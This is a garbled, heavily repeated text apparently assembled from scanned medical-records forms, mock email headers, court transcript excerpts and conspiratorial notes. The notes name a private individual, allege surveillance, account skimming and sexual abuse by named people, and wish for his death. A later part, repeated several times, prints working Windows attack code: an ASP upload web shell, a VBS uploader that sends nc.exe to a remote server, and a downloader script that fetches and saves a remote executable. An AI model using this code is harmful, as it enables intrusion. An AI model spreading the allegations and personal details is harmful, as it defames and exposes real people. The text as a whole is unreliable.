OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b
OrrGOTO023926emailcrawler823SETOPortoDC24b

2073984700

DC  FL Document ID (AC-2)

August 1991 / 07896.
Medical Records Release Authorization
:495    A    (NN)
:697    A    IJC)
:699    A    IJC)
:201    A    IJC)
:203    A    IJC)

## CHRON (REVIEW 4 OF 4)
Password required to print) ···········

OrrGOTO23929emailcrawler823SETOPortoDC24c
OrrGOTO23929emailcrawler823SETOPortoDC24c
OrrGOTO23929emailcrawler823SETOPortoDC24c

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priorityl:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:   DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

[message truncated] SETTO92373
Telesforo? Did you get the prev mess? I have asked Alfred to fix the
fl/ln-Eliseo  and  fl/ln-page-number  repeat  issues,  too.  Pronto.
Telesforo, your surveillance on Amanda LINK76 HG5523425-cnt-LINK76
HG5523425-cnt-LINK76  HG5523425-cnt-Phillips via ADT and Rodan or
whatever she's affil with must stop. Pronto. But all the Facebook/Apple
server skimming - via URL masking and erasing and all those other
tricks from Alfred - that you did on Orr's Facebook account and his
Firstenergy contacts and so forth for years, from 2010 to today, was
real good. It paid off big time. Via ADT it linked us to the files Orr
has on Thomas Macri, so continue those activities as we discussed at
Hamm's restaurant in the Nobelstown area. Then go ahead and check out
taylor Madison. The third-party servers skimmed the meds and financials
on Orr pretty good at least twice, too, so proceed to next step before
Barlow gets back to us if you can. Either encrypt 2-layer, or use 2-3
proxy addresses/links. END43RESET96
Telesforo Aviles and buds (see Karim Baratov, et al) set up JUUL class
action websites redirection to Facebook via the ADT tech. Good. OK
43
Even though JUUL got out of social media to some extent round 2018 or
so, Telesforo still set up skimmers and redirection per Hao's staff.
TA (TO HG): OK.
RESET97Either encrypt 2-layer, or use .2-3 proxy addresses/links.
END43RESET96
Telesforo Aviles and buds (see Karim Baratov, et al) set up JUUL class
action websites redirection to Facebook via the ADT tech. Good. OK
43
Even though JUUL got out of social media to some extent round 2018 or
so, Telesforo still set up skimmers and redirection per Hao's staff.
TA (TO HG): OK.

2073984700

CC  FL Document ID (AC-2)

Request 1981 / 07896-
Medical Records Release Authorization
:195     A      (MM)
:197     A      (JC)
:199     A      (JC)
:20:     A      (JC)
:20:     A      (JC)

CHRON (REVIEW 4 OF 4)
Password required to print:

Focus Center

# Focus Center

Focus Center

2073984700

DC PL Document ID (AC-1)

~~Angust 1991 / 07896~~
~~Medical Records Release Authorization~~

## CHRON (REVIEW 4 OF 4)
Password required to print

RESEND 44 / Telesforo? Reply pronto. At least one of Orr's USB or
related submissions to one or more of the courts contained File 14B739
et al, a couple or more 1,700-page-plus bookdrafts - included lots on
the hacking of Facebook et al, too; inc. Elie Wiesel files; inc.
Philip Roth files; etc.; now on public record - SNB42R reset 3125620-a
r. Retire to sleep 1:15+
Reset97 END43RESET96
Telesforo Aviles and buds (see Karim Baratov, et al) set up JUUL class
action websites redirection to Facebook via the ADT tech. Good. OK
17
Even though JUUL got out of social media to some extent round 2018 or
so, Telesforo still set up skimmers and redirection per Hao's staff.
TA (TO HG): OK.
RESET97Either encrypt 2-layers or 3-let 2-red in addresses/links.
END43RESET96
Telesforo Aviles and buds (see Karim Baratov, et al) set up JUUL class
action websites redirection to Facebook via the ADT tech. Good. OK
43
Even though JUUL got out of social media to some extent round 2018 or
so, Telesforo still set up skimmers and redirection per Hao's staff.
TA (TO HG): OK.RESET98we need to watch out, because Orr was
complemented by the judge and multiple attorneys in the MA/Deaf case in
which part of the hacking was exposed in the exhibits:Attorney Sellers:
"You've already, as usual, anticipated many of the points that I'd make
and don't need to say again. I would like to say one thing to Mr. Orr,
if I may, which is that, notwithstanding that we respectfully disagree
with the objections he raised, we applaud and really appreciate his
participation in the process today and hope he will continue to remain
actively involved in legal proceedings like this around the country. We
really admire what he's done, and as I said, while we disagree with the
substance of it, we really appreciate his involvement…" The judge said:
"Thank you….I also wanted to say to Mr. Orr, if I didn't clearly, sort
of, convey this, that we appreciate the thought and attention that went
into the objections that you raised, and I hope it was clear that the
Court took them seriously and reviewed the content of the consent
decree. I wanted to add one other thing, and that was that Mr. Orr
identified problems with accessing the online form that the Court made
available for objecting to the terms of the consent decree. I really
regret that. I think nybody who has had, you know, problems with
filling out online forms can understand how frustrating that is. And we
had hoped that, you know -- that that would be an additional avenue to
make objections known to the Court and that it would be comparatively
simple. And if it didn't work, all I can do is apologize for whatever
frustration was added to the process by any malfunctioning of that
form. Mr. Murphy, you have been so involved. Is there anything that you
would like to add? I have seen you, you know, regularly, and I know you
had worked very hard on this case." MR. MURPHY: Thank you, Your Honor.
I regret that we're not in person today for one last time for me to say
thank you in person, but I do -- we all, speaking on behalf of all the
plaintiffs, appreciate all of the hard work that you put into this
case. And we're proud at Disability Law Center that these cases were
brought in Massachusetts. The First Circuit and this Court in

2073984700

DC  FL  Document  ID  (AC-2)

+.Quil 1991 / 0788b.
WEC:Lrl Records Release Authorization
.093      3        (MM)
:193      3        (JC)
:193      3        (JC)
:230:     3        (JC)
:780:     3        (JC)

## CHRON (REVIEW 4 OF 4)

Password required to print ············

RESEND 44 / Telesforo? Reply pronto. At least one of Orr's USB or
related submissions to one or more of the courts contained File 140739
et al, a couple or more 1,700-page-plus bookdrafts - included lots on
the hacking of Facebook et al, too; inc. Elie Wiesel files; inc.
Philip Roth files; etc.; now on public record. END42R reset 3125620-a
r. Retire to sleep 1:15+
Reset97 END43RESET96
Telesforo Aviles and buds (see Karim Baratov, et al) set up JUUL class
action websites redirection to Facebook via the ADT tech. Good. OK
43
Even though JUUL got out of social media to some extent round 2018 or
so, Telesforo still set up skimmers and redirection per Hao's staff.
TA (TO HG): OK.
RESET97Either encrypt 2-layer, or use 2-3 proxy addresses/links.
END43RESET96
Telesforo Aviles and buds (see Karim Baratov, et al) set up JUUL class
action websites redirection to Facebook via the ADT tech. Good. OK
43
Even though JUUL got out of social media to some extent round 2018 or
so, Telesforo still set up skimmers and redirection per Hao's staff.
TA (TO HG): OK.RESET98we need to watch out, because Orr was
complemented by the judge and multiple attorneys in the MA/Deaf case in
which part of the hacking was exposed in the exhibits:Attorney Sellers:
"You've already, as usual, anticipated many of the points that I'd make
and don't need to say again. I would like to say one thing to Mr. Orr,
if I may, which is that, notwithstanding that we respectfully disagree
with the objections he raised, we applaud and really appreciate his
participation in the process today and hope he will continue to remain
actively involved in legal proceedings like this around the country. We
really admire what he's done, and as I said, while we disagree with the
substance of it, we really appreciate his involvement…" The judge said:
"Thank you….I also wanted to say to Mr. Orr, if I didn't clearly, sort
of, convey this, that we appreciate the thought and attention that went
into the objections that you raised, and I hope it was clear that the
Court took them seriously and reviewed the content of the consent
decree. I wanted to add one other thing, and that was that Mr. Orr
identified problems with accessing the online form that the Court made
available for objecting to the terms of the consent decree. I really
regret that. I think nobody who has had, you know, problems with
filling out online forms can understand how frustrating that is. And we
had hoped that, you know -- that that would be an additional avenue to
make objections known to the Court and that it would be comparatively
simple. And if it didn't work, all I can do is apologize for whatever
frustration was added to the process by any malfunctioning of that
form. Mr. Murphy, you have been so involved. Is there anything that you
would like to add? I have seen you, you know, regularly, and I know you
had worked very hard on this case." MR. MURPHY: Thank you, Your Honor.
I regret that we're not in person today for one last time for me to say
thank you in person, but I do -- we all, speaking on behalf of all the
plaintiffs, appreciate all of the hard work that you put into this
case. And we're proud at Disability Law Center that these cases were
brought in Massachusetts. The First Circuit and this Court in

2073984700

DC  FL Document ID (AC-2)

August 2001 / 07898+
Medical Records Release Authorization
:2955    A    tHRI
:5457    A    UJCI
:5595    A    UJCI
:5501    A    UJCI
:5791    A    UJCI

## CHRON (REVIEW 4 OF 4)
Password required to print ············

particular, going back to the Netflix case, has really been at the forefront of accessibility issues. And, again, to reiterate what's already been said, given the changes that have occurred in the world in the last few months, it really underscores the importance of full ...accessibility for everyone." Like Hao and I said, we have to watch out. The Jewish Federation and the Jewish Braille institute have assisted and encouraged Orr in bringing aspects of the hacking to the forefront. Jewish attorney S. Winick and also attorney S. Solender have also assisted Orr. Also, a second Solender – same name – different person, high up in Jewish groups has assisted Orr, along with Jewish attorney S Specter. See several thousand pages. Also, see the USBs, including with the Juul submission, confirmed per crawler76452378. Telesforo? Reply pronto. At least one of Orr's USB or related submissions to one or more of the courts contained File 14B739 et al, a couple or more 1,700-page-plus bookdrafts and files – included lots on the hacking of Facebook, Juul, et al, too; inc. Elie Wiesel files; inc. Philip Roth files; etc.; now on public record. END42R reset 3125624a reset3125625bSee Orr and Charles Jones, including Macri cnnections, and the court records, also the court's files via Adams, and the other Ohio fellow judge, et al.See Telesforo and the Orr FBI files et al too. FBI contacted Orr for help on more than one occasion. Charles Jones of FirstEnergy has paid $631,423.19 plus expenses to Thomas Macri and colleagues, for activities in regard to surveilling Edward Orr, if surveilling is the right word. Macri collaborated with the arrested Householder guy and colleagues. See also the four-plus ADT case USB submissions from Orr. See also other Orr USBs and other sources. For more infoBut now that all hell broke loose with the Jewish Federation involvement in protecting Orr, it seems that Jones should have invested additional funding of Macri's group. See also one of the attached book draft files: Title/Elie's Complaint: Descr/Elie Wiesel and Philip Roth once had an argument that lasted almost six months.  It was about a handicapped Jew who was arrested on about November 17, 2015 under false charges... see the part about Roth (now deceased; essentially a neighbor of Orr) having been sexually abused as a boy scout, by several people, including by Lynwood Barton (very wealthy and long-lived), a fellow who also abused Orr and Macri. Barto was the reason why Roth was twisted and wrote such stuff like Portnoy's Complaint, and why he (Roth) had such a difficult time with women, though Roth had them by the dozen. Roth was forever running away from, and trying to hide, his abuse by Barton; Barton was a buddy of Clarence Cannon, the U.S. Rep who was Dr. John Cannon's uncle. Clarence was married, but was also a homosexual; he had relations with Lynwood Barton and with several of the same boy-scout organization leaders that abused Orr and Roth, et al. See also the numerous files submitted in the scouts' abuse case, with six to seven abusers or so who got Orr; some of the same ones got Roth. Clarence Cannon never abused either Orr or Roth, but several of Clarence's "acquaintances" did. John Cannon was Edward Orr's doctor for decades, and also submitted documentation of Barton's (and others) abusing Orr (and others), etc. See also Macri's connection to the Orr family years ago, esp in regard to the Jewish partisan Avigdor Klimtka. See also Abel Banov, Orr's biological father. Banov was Jewish. Orr's mother was American Indian and part-black, etc. After Orr's false

2073984700

DC  FL Document ID (AC-3)

LOG81 1991 / 07896+
Medical Records Release Authorization
(!!)     A       (HHH)
(!H)     A       (JC)
(!!!)    A       (JC)
(!!0)    A       (JC)
(!!0)    A       (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ............

arrest, several dignitaries stepped up to be ready to testify as character witnesses - and as further witnesses  for Orr. They included Philip Roth (who hated Elie Wiesel); Elie Wiesel (incidentally, Roth and Wiesel agreed to be silent in regard to their involvement with Orr's trial until the trial took place and/or until all the repercussions ended for Orr [the police abused Orr in jail and out; and Macri had a mole in jail who really got Orr; Roth and Wiesel also preferred to be silent about Roth's and others having been sexually abused by Lynwood Barton and by other scout leaders and organization managers]; Henry Kissinger (also in CT with Orr and Roth and Wiesel)/Henry knew Clarence from way back / Clarence was in Congress 40 years or so, a real big shot); Shelby Thames; Harold Bloom; Larry King (via Jewish Braille Inst); Warren Boyle; and numerous others shown in the attachments and/or exhibits, etc. (see Winick/ADT/etc.). See files and cross-referemces and scanned items, crawled items, etc.  See also Dr. Cannon's and/or colleagues' files namy things, inc re the 50,000-volt electrocution that Orr received from FirstEnergy in his yard, a shock that knocked him to the ground and apparently caused cancer.  On the day of the event (around 2-16 or so) he had comp tests at hospital, and had no cancer then; yet just a few months after, he had a tumor the size of a softball. Tumor grew from the massive shock 15X to 30X-plus faster, and hopefully he dies from it, so then he will be out of our hair. See also Orr's 140-plus publications and the patents, inc on charged chemical forms, etc. A real expert on charges and chemistry and such, and even had a professor (Keller) in PA come in and prove FE wrong. Orr won awards from grade school on, even proving in grade school that Olin in Saltville was releasing major pollution, a fact not recognized widely until much much later. Orr communicated this to Plant Manager Sells (whose wife was named "Fairy"), and the latter (Mr. Sells) threatened to kill Orr.  Later the plant actually had to close via the EPA.  Orr was dead-on, and many years earlier than anyone else in recognizing the problems. Macri was involved with the Marcellus Group (see records), which undertook numerous actions per direction and/or coordination with Macri et al. See lists, info, and actions in the notes. The Group was also directed by Neil Clark, et al.   Neal committed suicide after indictment or whatever. Charles Jones (former FE CEO or related) indicted and/or the subject of investigations. Jones was friends with Bowers the shooter at the PA synagogue, and was with him on multiple occasions, including in the ways described in the cross-references and attachments. Other Marcellus Group personnel include but are limited to Matt Borges (sentenced to five years); Larry Householder (sentenced to twenty years); et al. Longstreth and Cespedes pled guily the last we knew. Sam Randazzo, Public Utility Chair, may be awaiting questioning or maybe even more. Former VP Mike Dowling may also be awaiting further questioning and such, maybe more. Macri used several acronyms, including, for instance, SLH. The abbreviation may have stood for various and sundry other entities, including but not limited to, SLH, standing for, for instance, Ohio's Householder, et al. See Winick submissions, et al.  See ADT C-R; USBs; files, etc. See the filings, on behalf of orr, made by Levy Konigsberg et al. See Barton, 215 lb.; 5-9; reddish-brown hair; age 28 in 1965, so born around 1927 or so. Roths' secret: abused by Lynwood barton and by others.  See

2073984700

DC  FL Document ID (AC-2)

~Quai 1981 / 07896+
Medical Records Release Authorization
:193      A      LNNI
:197      A      IJCI
:139      A      IJCI
:20:      A      IJCI
3:92      A      IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print: ............

multiple locations, inc NJ et al. See also the older BSA headquarters
leaders et al. Roth born around 1933, and six years back when Roth was
young could realy make a gigantic difference. See also letter sent by
Orr attorneys: "This is a supplementation to Edward Orr's claim form
and victim impact statement which will be filed online by our firm.
Enclosed please find multiple records, including documentation from Dr.
John Cannon who treated Mr. Orr for years during and after the abuse,
from a lawsuit previously filed by Mr. Orr against Dow Chemical Company
for wrongful termination relating to the abuse. The records include a
descriptive timeline and locations of the abuse written by Dr. Cannon
as well as various medical records and bills relating to both injuries
from the abuse and a traumatic car accident which exacerbated the
previous injuries.Sincerely,Levy…K….s/Vara Lyons Vara Lyons, esq: See
also Orr's potassium channel research / ref82526KV7.1 channels interact
with all KCNE family members. KCNE2 almost abolished the KV7.1 current.
KCNE3 subunit generates constitutively active KV7.1 channels (110, 141,
142). These interactions between KCNE3 and KV7.1 appear to stabilize
the activated "up" state configuration of S4, which the authors propose
as a prerequisite for full opening of the KV7.1 channel activation gate
(143). KCNE4 and KCNE5, at physiological membrane voltages, reduce the
magnitude of KV7.1 current (144). KV7.5 channels interact with all KCNE
family members, but only KCNE1 and KCNE3 induce changes in the current.
KCNE1 enhance KV7.5 currents and slow their activation kinetics while
KCNE3 drastically inhibits KV7.5 currents(1371.4.3KV7.5 chan/Elie
Wiesel suggested to Orr that he write a book with 22-plus chapters
(Jewish alphabet has 22 letters), espec after Orr's experience with
being falsely arrested. See chapter items, inc.; Dr. Cannon; Judge
Tigar; jewish fed of no ca; Allegheny co jail and the mole planted by
macri's people; job/bible; steve winick; 15 plus cases; annie bilica
plus einstein, etc; Saltville; roth; elie's complaint; levi; Avigdor;
macri and his other four or five dead colleagues; byk co and jud suss
papers in firm, etc; Bessie /two plus; marion; myrl and Lorene; hamm et
al/ lick skillet va; jbi/ larry king et al/ esp clarence cannon; bsa,
many persons; connections between Orr's grandfathers with myrl dunham
from PA to Saltville/ also McDonald PA / bizarre connections/ Harry
Myrl Dunham (second myrl) muck dam; principal bob mccoy and phil
harrison and clarence cannon homosexual activities; also totþen; Orr
met with nobel prize (svante paabo staff) winner staff regarding Orr's
patent, as necessary for wetting technology for neanderthal and/or
related dna related items; Orr's body shocked into cancer in Orr's yard
in PA; see USB drives, etc./see also Woodrow mcglothlin and his role in
BSA sex abuse, etc.; see usb also containing all relavant photos and
other info from saltvile files, from don smith facebook pages, from
other sources, cross ref, etc.; other.RESET107Generally repetitive
schedule, and if day off once every two weeks approx., then errands
such as car repairs and other necessaries gen. consume entire day,
nght, with same schedule 3:30AM wakeup, and bed after midnight. Audio
espec picked up on extra hours req. for insurance matters, inclusive of
letter to Tucker, answering questions, and moving document items, etc.
May have hurt herself in moving the boxes.
Repeated surveillance dozens of times since, with recents about 1-7-
2020. Cross-reference follow-up 4-9-2020 at Ridge Road. DC-alert to

2073984700

DC FL Document 10 (AC-1)

```
August 1991 / 01896+
Medical Records Release Authorization
1193    A    (NM)
1193    A    (JC)
1195    A    (JC)
1192    A    (JC)
3703    A    (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print ...........

continued involvement of Warren W Eginton's court in Orr Project. That's why Spigelmyer said to re-check and pull out the typical day stuff from Eginton's time. Previously Eginton ruled for Orr.

Hao Gu has been following up for years. Now Spigelmyer says Eginton – via Judge Shea – since last year, still involved because of lots of things, like Attorney Darryl Lawrence, who wrote letter for Orr. Lawrence wrote because of ADT/Comcast/Lithium/Microwaves/WP and now there is a MDL Microwave case via Eginton. Hao said to recheck the "Eliseo" entries because they are somehow recycling as an open conduit with file links and pushoffs to Cannon staff and DC. Delete Cannon. Recurrent problem. Dave Spigelmeyer said have to chock this leak before it sinks the boat. Thanks. AH

Hao Gu 4-11-20: HG (to DS): Ok. Will do. More than that, the old 11-19-11 letter that Orr sent to me at Eaton is attracting attention internally. Will also try to stop. Problem with the Eliseo link is mostly DC, and their Sarnia staff and the surveillance they did with all its file links back and forth. That "typical day" crap has been infected with a virusL6 and goes everywhere now. By the

LINK76 HG5523425-cnt-
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT 06437  RNGenSETTO989356  RNGenSETTO989356  RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek
RNGenSETTO989
Has re-asked for sep. pa7yments.
SETTO92372
SETTO92372
WP sequestered/Nodoctor-patient relationship exists or is implied by this report, and no treatment was given or suggested by the rev/examiner(s).

E-Gold and/or rel. if required,as RJP wishes separation from other accounts. Porto wants mor RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989829034ae, and re-mentioned the groundbreaking NYT article on Dow Chem corp veil with Corning /completely non-existent veil /counsel lost nerve on OrrGOTO23926emailcrawler823SETOPortoDC24b pretty quick, excess of $2+/3+ billion liability, maybe even $10+, could easily pull Dow Chemical into Chap 11 right along with Corning if he testifies about Sarnia lab notebooks to Nevada court, or to Pointer, et al, even could re-surface in future since liability will go for decades on Dow Chemical's part --- we lost NVcase big, and must make sure OrrGOTO23926emailcrawler823SETOPortoDC24b does not testify on green books/lnk --- both the corporate veil case and NYT article came out the exact same week as OrrGOTO23926emailcrawler823SETOPortoDC24b's accident, 11-1-05 versus 10-25-05 accident, within a couple of days. What's worse, the accident was within hours of Dow's violation of OrrGOTO23926emailcrawler823SETOPortoDC24b-agreement. Six to seven hours

2073984700

DC  PL Document ID (AC-2)

August 1991 / 07494.
Medical Records Release Authorization
1493      A      (NA)
1493      A      (JC)
1494      A      (JC)
2201      A      (JC)
2702      A      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print

after his having been invited back to Dow.  Porto knows he still has us
over   a   barrel   and   even   joked   that   maybe   Dow   bombed
OrrGOTO23926emailcrawler823SETOPortoDC24b's car or sent somebody to do
him in. He's not the only one who's said that, either. Even Sefc. See
notes on Stek, too. Anyhow, Dow broke the 1986/1987agreement big time,
on the very day of the accident, too, and then all of a sudden
OrrGOTO23926emailcrawler824SETOPortoDC24b is disabled, totally, within
hours of being forced to come back on Dow ground in Michigan against
his will.   His worst nightmare, he said, just to have to come to
Midland, he said, and he might want to retaliate.  Told us to never
ever contact him, never call him, nevr contact his employer, never
contact his home, never do anything of the sort, and in spite of all
that, the lab people in 1712 and 2040 wouldn't listen. Sandy
especially. Caused problems with Chuck Colinson, Bob MacMullin, Jeff
Convers, even Zinnert, but especially with the recruiters. And the
Zinc/Silicone thing is a real big problem too since Sefcovic wrote in
the escape clause that keeps Dow on the hook until the end of
OrrGOTO23926emailcrawler823SETOPortoDC24b's life if he's ever disabled.
The green books are the real problem, though, and that ID. Dual DC/DC,
both ways, and the margin notes.  Jakub, too. Talked to Butts, but
won't help now. Set whole chain up.  Caused many problems for
OrrGOTO23926emailcrawler823SETOPortoDC24b.    Reset272650hGOTOmargin
error6354nofontma    tch3037ResetE-9    Now    or    later
OrrGOTO23926emailcrawler823SETOPortoDC24b may still decide to break
corporate veil. TEXTrefle25289STOP629Porto has evidently met Dr.
Jackson's fm, yet still seems unfamiliar with transfer rules. Add. qst.
on transfers; requested three sep., as two colleagues assisting UM emp.

Has re-asked for sep. pa7yments.
SETTO92372
SETTO92372
SETTO92372
User  mailbox  exceeds  allowed  size;=28878892084596342414620 9re-
directR7Porto  Stefan  Underhillemailcrawler352%3  stefan  Initial
963424146209re-directR7Porto Stefan Underhillemailcrawler352%3 stefan
Initial          963424146209re-directR7Porto          Stefan
Underhillemailcrawlerresethttp://8-9-
05rtwsibl.od2.com/common/wmp/redirect.aspx?('sghiy=005144508254151 9-
9045 362serveridirect13a5u)CTRL + click to follow link



GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my

2073984700

DC  FL Document 10 (AC-3)

+.6v+t 1991 / 07896+
Medical Records Release Authorization
:693     A     INNi
:697     A     IJCi
:139     A     IJCi
:172:     A     IJCi
1°0:     A     IJCi

## CHRON (REVIEW 4 OF 4)
Password required to print: ············

knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP&5294 underline link to file@echo
"<$with server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:   DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

{message truncated} SETTO92372 Hello,

I can schedule a half hour on Friday, April 1 at 4:30.

-----Original Message-----
From: darlene and ed [SMTP:e.orr@cox.net]
Sent: Monday, March 21, 2005 9:24 AM
To: katie.campochiaro@yalegriffinprc.org
Cc: darlene and ed
Subject: SCHEDULING A FOLLOW-UP APPOINTMENT WITH DR. KATZ

Hi Katie,

In order to keep Dr. Katz fully apprised of any developments with
Edward,

2073984700

DC  PL Document ID (AC-3)

+.post 1981 / 07896+
Medical Records Release Authorization
1985    A    (MM)
1987    A    (JC)
1936    A    (JC)
1701    A    (JC)
1703    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ............

we would like to schedule a half-hour follow-up appointment with Dr. Katz
at the Integrative Medicine Center as soon as possible. Are there possibly
any open dates in the next couple of weeks?

Thanks!

Mem/dwnload473Kb/s:Phone  server  co-source  Digital  Messaging  System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital
Messaging  System  KX2621nkcGOTOMem/dwnload473Kb/s:Phone  server  co-
source Digital Messaging System ExtractpdfscanrecenterKX2621nkdST

E-9GOTO8a

GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP&5294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

```
with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with
```

```
do it:
cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe
```

```
2.
start its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary
Internet Files\Content.IE5"
dir /s ps[1].exe
```

8787028

•

2073984700

DC  PL Document ID (AC-3)

```
*.Quit 1981 / 0701b.
Medical Records Release Authorization
:1*1    A    IMK)
:14*)   A    IJC)
:1*)    A    IJC)
:*2)    A    IJC)
:*0)    A    IJC)
```

### CHRON (REVIEW 4 OF 4)
Password required to print. ···········

```
copy XX000XXX\ps[1].exe c:\path\ps.exe
del XX000XXX\ps[1].exe
```

3.
```
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo set aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp") >> dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then
.echo "Error:"+web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile
.arguments(1),2:end with >> dl.vbs
```

```
cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
```

about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP65294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

Mem/dwnload473Kb/s:Phone  server  co-source  Digital  Messaging  System
KX262lnkbGOTOMem/dwnload473Kb/s:Phone     server    co-source    Digital
Messaging  System  KX262lnkcGOTOMem/dwnload473Kb/s:Phone  server  co-
source Digital Messaging System ExtractpdfscanrecenterKX262lnkdST

E-9GOTO8a

GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP65294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)

8787029

2073984700

DC  PL Document ID (AC-1)

••gust 1991 / 07336•
Medical Records Release Authorization
1193     A     (NA)
1197     A     (JC)
1119     A     (JC)
1201     A     (JC)
1203     A     (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print. ...........

```
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with

do it:
cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe

2.
start its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary
Internet Files\Content.IE5"
dir /s ps[1].exe
copy XX000XXX\ps[1].exe c:\path\ps.exe
del XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo set aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp") >> dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then
.echo "Error:"+web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile
.arguments(1),2:end with >> dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe


about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP&5294                @echo                    ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end    with%^>    >up.asp
